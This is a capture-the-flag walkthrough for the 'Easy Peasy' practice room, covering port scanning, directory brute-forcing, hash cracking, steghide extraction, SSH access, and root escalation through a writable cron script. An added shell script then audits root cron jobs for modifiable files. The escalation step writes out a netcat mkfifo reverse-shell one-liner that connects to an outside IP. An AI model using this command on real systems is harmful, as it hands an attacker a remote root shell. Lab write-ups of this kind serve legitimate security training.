# Easy Peasy

![](/files/-Mc0So3sFHDvYzE6o8sv)

## Reconnaissance

Initial nmap scan to find all open ports:

```
nmap -p- -T5 10.10.53.168
```

![](/files/-Mc0Vce88L1uCBbstAtY)

There are three ports open.

![](/files/-Mc0VtlciQrUiu1p3tRC)

Detailed nmap scan:

Command breakdown:

* (**-sV**): Service version
* (**-sC**): Default nmap scripts
* (**-p**): Specifying ports 80,6498,65524
* (**-oN nmap**): Saving it into a file called nmap

```
nmap -sV -sC -p 80,6498,65524 -oN nmap 10.10.53.168
```

![](/files/-Mc0VniToMMzLPupJHPZ)

The version of nginx is `1.16.1`.

![](/files/-Mc0W0X-2_3HbPkcqu-g)

Apache is running on the highest port.

![](/files/-Mc0WCus0VHTQLErg99d)

## Enumeration

### Port 80: HTTP

Let's visit the site.

![](/files/-Mc0WSbeHnPR6lIk1Rjp)

There is nothing interesting in the links provided or in the source code, so let's run `gobuster` to find hidden files and directories.

```
gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://10.10.53.168/
```

![](/files/-Mc0_T3559PexdYBvioy)

Looks like we found a directory. Let's run another gobuster scan on this directory while we explore it.

![](/files/-Mc0aJUtiMW4fSEG1eAI)

We found another directory. Let's visit both of these pages.

![](/files/-Mc0b16tfZUeOGKaLu7Q)

There seems to be nothing here, so let's go to the `whatever` directory.

![](/files/-Mc0bWbaufe4QjD6ID0c)

There is nothing on the page, so let's look at the source code.

![](/files/-Mc0bbJdFbytJU2KTtqA)

We have a hash, let's decrypt it.

![](/files/-Mc0bupx9jVpT1UmWQPB)

We have the first flag.

![](/files/-Mc0c0saglOtYfmozSmV)

### Port 65524: HTTP

Let's visit the site.

![](/files/-Mc0XQJIv29IRgEWTDBo)

It's an Apache 2 default page. Scrolling down a bit, we find flag 3.

![](/files/-Mc0a-Xsw6kpICY-EZ4p)

![](/files/-Mc0aFB9fCRhaeqWKFBO)

Let's run gobuster to find hidden directories and files.

```
gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://10.10.53.168:65524/
```

While gobuster is running, let's check the `robots.txt` page. We find some interesting information there.

![](/files/-Mc0Ya9Nmg8oF3rtODiW)

This looks like a hash, so let's try to crack it. First, let's identify what type of hash it is.

![](/files/-Mc0afKh2hnSZxY7rDAi)

It's an MD5 hash, now let's crack it.

![](/files/-Mc0amGHgUFI2jrNN_yU)

And we have the second flag.

![](/files/-Mc0arCjEhmJKEEU4ZkG)

Looking back at the default page, we have something else in the source code.

![](/files/-Mc0cysGg96X7ZJsMl33)

Another hash. Let's crack it.

![](/files/-Mc0dFJ5MAl_ILR1JBtu)

It's another directory, let's visit it.

![](/files/-Mc0dP0pINuVK6KsF9Ys)

It's a page with a binary code image, so let's look at the source code.

![](/files/-Mc0dkuCPnTVV6915Yff)

We have a string, let's try to identify the hash.

![](/files/-Mc0e3p3sgaB9rZ22LC5)

Let's crack it.

![](/files/-Mc0eeFx-6wRfq96s7ZO)

Looks like it is a password.

Now let's download the binary picture and see if there is anything hidden in it using `steghide`.

```
steghide --extract -sf binarycodepixabay.jpg
```

It is asking for a password, so I used the one we just found.

![](/files/-Mc0eqwfqXEI7a-ocPYc)

We found a text file, let's read it.

![](/files/-Mc0ewJCSTf4A_GU6zk-)

We have a username and a password in binary, let's decode it.

![](/files/-Mc0f5re_tIXRJu74xz6)

We found the password, so let's log in through SSH. The SSH server is running on port `6498` based on our nmap scan.

```
ssh -p 6498 boring@10.10.53.168
```

![](/files/-Mc0fZ3EIpf_GpdvJCfR)

We are logged in.

We can read the user.txt file, but it seems to be encrypted, so I will leave cracking it to you. (Hint: CyberChef and ROT 13)

![](/files/-Mc0ftJgzYZjyt_bC-Ef)

We can also answer all the other questions.

![](/files/-Mc0gCt8wWPk_GuT9A0r)

## Privilege Escalation

As the room had cronjob as one of its tags, I looked for `.sh` files on the system that belonged to the user `boring`.

```
find / -type f -user boring -name "*.sh" 2>/dev/null
```

![](/files/-Mc0h9-8tC0Wk9tvZpQA)

Looks like we have a file, let's look at it.

![](/files/-Mc0hGHMsk4AuIqkXXuA)

It says it will run as root, so why don't we echo a reverse shell into the file to get a shell as root.

```
echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.13.8.64 1234 >/tmp/f" >> .mysecretcronjob.sh
```

Make sure to change the IP in the command and start a netcat listener.

![](/files/-Mc0hbnCw6aoGbnjb6ku)

Once you echo the command into the file, the contents of the file should look like this.

![](/files/-Mc0imnhRimz9gZngqK0)

After a while you should get a shell as root.

![](/files/-Mc0iBpPvHcu4a4mgNQl)
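
The weakness used above is a root cron job that executes a script owned by an unprivileged user. As an added example (not part of the original writeup), this audit reports files named in root cron jobs that someone other than root can modify; `TRUSTED_UID`, the function names and the `--demo` sample crontab are assumptions of this sketch.

```sh
#!/bin/sh
# Added example: flag files run by root cron jobs that a non-root user could modify.
# Assumes system-style crontab lines (/etc/crontab, /etc/cron.d/*) with a user field.
TRUSTED_UID="${TRUSTED_UID:-0}"   # owner allowed to control root's job files (0 = root)

# True if the path is owned by another UID or is group/world-writable.
is_modifiable() {
    [ -n "$(find -L "$1" -prune \( ! -user "$TRUSTED_UID" -o -perm -020 -o -perm -002 \) 2>/dev/null)" ]
}

# Print the command part of every job the crontab runs as root.
root_commands() {
    awk '
        NF == 0 || $1 ~ /^#/ { next }              # blank lines and comments
        $1 ~ /^[A-Za-z_][A-Za-z0-9_]*=/ { next }   # environment assignments
        { n = ($1 ~ /^@/) ? 2 : 6 }                # "@daily user cmd" or five time fields
        $n == "root" { for (i = n + 1; i <= NF; i++) printf "%s ", $i; print "" }
    ' "$1"
}

# Print "RISK <path>" for each existing file named in a root job that is
# modifiable directly or through its parent directory.
audit_crontab() {
    set -f                                         # do not glob-expand command words
    for word in $(root_commands "$1"); do
        case "$word" in /*) ;; *) continue ;; esac
        [ -f "$word" ] || continue
        if is_modifiable "$word" || is_modifiable "$(dirname "$word")"; then
            echo "RISK $word"
        fi
    done
    set +f
}

# Constructed sample: two root jobs (one script world-writable) and one non-root job.
demo() {
    d=$(mktemp -d) && TRUSTED_UID=$(id -u)         # current user stands in for root here
    printf 'echo ok\n' > "$d/safe.sh";  chmod 755 "$d/safe.sh"
    printf 'echo ok\n' > "$d/loose.sh"; chmod 777 "$d/loose.sh"
    printf '%s\n' '# constructed crontab' 'PATH=/usr/bin:/bin' \
        "* * * * * root bash $d/safe.sh" "*/5 * * * * root bash $d/loose.sh" \
        "@daily www-data bash $d/loose.sh" > "$d/crontab"
    audit_crontab "$d/crontab"
    rm -rf "$d"
}

if [ "${1:-}" = "--demo" ]; then demo; elif [ -n "${1:-}" ]; then audit_crontab "$1"; fi
```

On a real host, run it as root against `/etc/crontab` and each file in `/etc/cron.d/`. Anything it reports should be owned by root and stripped of group and world write permission (`chown root:root`, `chmod go-w`).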

